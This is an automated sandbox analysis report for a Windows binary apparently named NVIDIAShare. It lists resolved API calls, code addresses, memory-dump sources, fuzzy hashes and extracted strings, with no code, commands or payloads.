                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            • Opcode ID: 5e9b1f5948d5ede331eca1620290bc120bc7f421ca398b697d1f1cd94713650f
                                                            • Instruction ID: 77572dba87375e63bc7a4dfe3971a20d318bad5496172d233b9976a4215ce5b3
                                                            • Opcode Fuzzy Hash: 5e9b1f5948d5ede331eca1620290bc120bc7f421ca398b697d1f1cd94713650f
                                                            • Instruction Fuzzy Hash: C8819371504301AFE711DFA8CD88A6BBBE9FBC8714F04491DFAC4AB291D675E8058B52
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0102CB66
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C71E
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C730
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C742
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C754
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C766
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C778
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C78A
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C79C
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7AE
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7C0
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7D2
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7E4
                                                              • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7F6
                                                            • _free.LIBCMT ref: 0102CB5B
                                                              • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                              • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                            • _free.LIBCMT ref: 0102CB7D
                                                            • _free.LIBCMT ref: 0102CB92
                                                            • _free.LIBCMT ref: 0102CB9D
                                                            • _free.LIBCMT ref: 0102CBBF
                                                            • _free.LIBCMT ref: 0102CBD2
                                                            • _free.LIBCMT ref: 0102CBE0
                                                            • _free.LIBCMT ref: 0102CBEB
                                                            • _free.LIBCMT ref: 0102CC23
                                                            • _free.LIBCMT ref: 0102CC2A
                                                            • _free.LIBCMT ref: 0102CC47
                                                            • _free.LIBCMT ref: 0102CC5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
                                                            • Instruction ID: 92a1fe252f5fb22641233d3ea0ec513d1b79043f541a32e0cbcd75d5f46099e7
                                                            • Opcode Fuzzy Hash: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
                                                            • Instruction Fuzzy Hash: F7315C316003269FFB62AA3DDA44B9A77E9AF10210F2088AAE5C8D7161DF31E844DB10
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 01019736
                                                            • _wcslen.LIBCMT ref: 010197D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 010197E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 01019806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0101982D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-4209811716
                                                            • Opcode ID: e0efe7301e4b73f9d288078a90531bf66969b580ce9f42389b7ff44089e771e0
                                                            • Instruction ID: 1e808a2ef87b8351e980c866ebd2a9022a9b0e351365c36056730496eca19ff7
                                                            • Opcode Fuzzy Hash: e0efe7301e4b73f9d288078a90531bf66969b580ce9f42389b7ff44089e771e0
                                                            • Instruction Fuzzy Hash: 4B316A32504312BAE725AF349C45FAF7B9CEFA5314F14011DF9C19A1C5EB6CD90983A6
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 0101D6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 0101D6ED
                                                              • Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0101D709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0101D720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0101D734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0101D75D
                                                            • DeleteObject.GDI32(00000000), ref: 0101D764
                                                            • GetWindow.USER32(00000000,00000002), ref: 0101D76D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
                                                            • Instruction ID: 25dfd916c8ba7c0ab13d058deccb356f20d20d70cb3819897a4b6106aaf2844e
                                                            • Opcode Fuzzy Hash: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
                                                            • Instruction Fuzzy Hash: B8112432601791BBF2316AB49C4DFAF7AACBF54711F004510FAC5AA09DEB6DCA0947E4
                                                            APIs
                                                            • _free.LIBCMT ref: 01029705
                                                              • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                              • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                            • _free.LIBCMT ref: 01029711
                                                            • _free.LIBCMT ref: 0102971C
                                                            • _free.LIBCMT ref: 01029727
                                                            • _free.LIBCMT ref: 01029732
                                                            • _free.LIBCMT ref: 0102973D
                                                            • _free.LIBCMT ref: 01029748
                                                            • _free.LIBCMT ref: 01029753
                                                            • _free.LIBCMT ref: 0102975E
                                                            • _free.LIBCMT ref: 0102976C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
                                                            • Instruction ID: a807f113391efa2cf6189ab72bf95ccdf6b102d967594a14376634fc56722bdd
                                                            • Opcode Fuzzy Hash: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
                                                            • Instruction Fuzzy Hash: 5111B67A51012ABFDB01FF54C840CDD3BB5EF24250B5199A2FA488F231DA32DA54DB84
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
                                                            • Instruction ID: 3009a68ba0c10372f4f5e81e888928a06bdf6dfffadf82987a72d16c11bf00eb
                                                            • Opcode Fuzzy Hash: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
                                                            • Instruction Fuzzy Hash: 12B19F3180022ADFCF65DFA8C8809AEBBB5FF18310F1441A9E9816F216D739DA51CF91
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 01006FAA
                                                            • _wcslen.LIBCMT ref: 01007013
                                                            • _wcslen.LIBCMT ref: 01007084
                                                              • Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
                                                              • Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
                                                              • Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: 213f1ec5c353957f1e24182f162d206d5cf168ed8176241598e85ff1c26ad575
                                                            • Instruction ID: ca10db17fc503464c14c077f19f12ba8a28207a9924c6d18ed898d4d9aa9e784
                                                            • Opcode Fuzzy Hash: 213f1ec5c353957f1e24182f162d206d5cf168ed8176241598e85ff1c26ad575
                                                            • Instruction Fuzzy Hash: 7B41C0B1E04745AAFB22E7789C81FEE77ACAF54300F004495FAC5A71C1D679B6888660
                                                            APIs
                                                              • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                              • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                            • EndDialog.USER32(?,00000001), ref: 0101B610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0101B637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0101B650
                                                            • SetWindowTextW.USER32(?,?), ref: 0101B661
                                                            • GetDlgItem.USER32(?,00000065), ref: 0101B66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0101B67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0101B694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: 8548c82282c6687606edc22c343d363b41ca74d2928992214359066839cee201
                                                            • Instruction ID: 34be27a9a6e3a3ee10a83ec1f57ab02219d233977af3c547384fd8adb991aca8
                                                            • Opcode Fuzzy Hash: 8548c82282c6687606edc22c343d363b41ca74d2928992214359066839cee201
                                                            • Instruction Fuzzy Hash: 7521B431604205BBE3316A69ED49F7B3FBCFB5AB45F010414FAC499098CB6FA8019771
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,423F441F,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 0101FE1F
                                                            • _com_issue_error.COMSUPP ref: 0101FE48
                                                            • _com_issue_error.COMSUPP ref: 0101FE52
                                                            • GetLastError.KERNEL32(80070057,423F441F,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE57
                                                            • _com_issue_error.COMSUPP ref: 0101FE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE80
                                                            • _com_issue_error.COMSUPP ref: 0101FE93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: fc9adad3dd5cad7c93487d85bdc7041872b68f4c853c29dd5006a78a51973ceb
                                                            • Instruction ID: bf140e08184431db7b974a15e5e8e20b8ca89c14d803a2490dde74f185a75901
                                                            • Opcode Fuzzy Hash: fc9adad3dd5cad7c93487d85bdc7041872b68f4c853c29dd5006a78a51973ceb
                                                            • Instruction Fuzzy Hash: 3A411B71A00217ABDB10DF68C844BEFBBE9FB48B10F104269F995EB284D73D9504C7A0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
                                                            • Instruction ID: 7207fa42f4e8cad32a68352760d62e6085b9f82051d3e727763a4dab0f4027f9
                                                            • Opcode Fuzzy Hash: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
                                                            • Instruction Fuzzy Hash: 5F717F74B00219EFEB25DFA5C8959AEBBB9FF88710F04015DE596AB290CB356D01CB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 01009387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 010093AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 010093C9
                                                              • Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2
                                                              • Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1
                                                            • _swprintf.LIBCMT ref: 01009465
                                                              • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 010094D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 01009514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 6089b2336391db8c68cac2eb6113e2b63ec04640b8ec5e58ef23cd54113f1bd4
                                                            • Instruction ID: 6c871d4ed023099e9c59116efca6dfc5708b24ac7b699d2667ab094f29e3e869
                                                            • Opcode Fuzzy Hash: 6089b2336391db8c68cac2eb6113e2b63ec04640b8ec5e58ef23cd54113f1bd4
                                                            • Instruction Fuzzy Hash: BE41B471900259A6FF22EB61CC44EDE737CAF54349F0048E5A6CDE3082DB398BC88B60
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 0101122E
                                                              • Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 01011251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 01011263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 01011274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 01011294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 010112CF
                                                            • __aullrem.LIBCMT ref: 01011379
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
                                                            • Instruction ID: c58816a347762b16a986687b2ae2cdc61769bce80be2144e975bca92625e5424
                                                            • Opcode Fuzzy Hash: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
                                                            • Instruction Fuzzy Hash: CC4107B1508306AFC754DF65C8849ABBBF9FF88214F00892EF6D6C6204E739E559CB52
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 01002536
                                                              • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                              • Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: 4308e38f9dbd4e020f9c28d07df30d2ff0e43c7d2a94fb945472a349a3545230
                                                            • Instruction ID: b00bfddbf71078920fbd15b6587dc51bc22943a1d932c61db0b363edee86153a
                                                            • Opcode Fuzzy Hash: 4308e38f9dbd4e020f9c28d07df30d2ff0e43c7d2a94fb945472a349a3545230
                                                            • Instruction Fuzzy Hash: 35F119706043429BFB17EB28C598BFE7BDA5F94300F0845BDEEC69B2C2CB6495458762
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
